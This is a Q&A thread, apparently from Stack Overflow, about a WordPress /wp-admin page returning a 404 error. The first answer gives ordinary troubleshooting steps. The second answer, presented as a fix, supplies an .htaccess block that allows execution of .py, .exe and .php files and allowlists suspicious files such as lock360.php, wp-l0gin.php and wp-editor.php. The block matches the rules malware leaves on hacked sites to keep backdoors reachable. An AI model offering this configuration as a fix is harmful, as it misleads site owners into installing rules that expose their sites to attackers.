# Wordpress 404 error on domain.com/wp-admin

Tags: wordpress, wp-admin, custom-error-pages

My WordPress site having issue so not able to reach out to the domain.com/wp-admin, it's redirect to 404 error. I have been tried out for delete ".htaccess" file however it's not working.Cache and cookies of the browser also have been clear out. Would need some advise how can I reach out to my domain.com/wp-admin.

I have been tried for using domain.com/wp-admin.php. Disable plugin however it's also not working from my end to redirect on my side

Comment: I’m voting to close this question because it’s not about programming

Answer (score 0):

Usually, a 404 error on /wp-admin/ is caused due to missing .htaccess in your website's root directory, so first thing first, make sure that you have a valid WordPress .htaccess ( https://wordpress.org/support/article/htaccess/ ).

After that, make sure that you do not have a plugin for a custom admin login as it might also cause this behavior. If the issue still persists after that, try accessing the admin login page at: yourdomain.com/wp-login.php

If none of the above work, you should ask your hosting provider for further help.

Answer (score 0):

If you already checked plugins/themes then .htaccess file could be the issue.

just update your .htaccess file with this:

```
<FilesMatch ".(py|exe|php)$">
 Order allow,deny
 Allow from all
</FilesMatch>
<FilesMatch "^(about.php|radio.php|index.php|content.php|lock360.php|admin.php|wp-login.php|wp-l0gin.php|wp-theme.php|wp-scripts.php|wp-editor.php)$">
 Order allow,deny
 Allow from all
</FilesMatch>
```

Hope this will help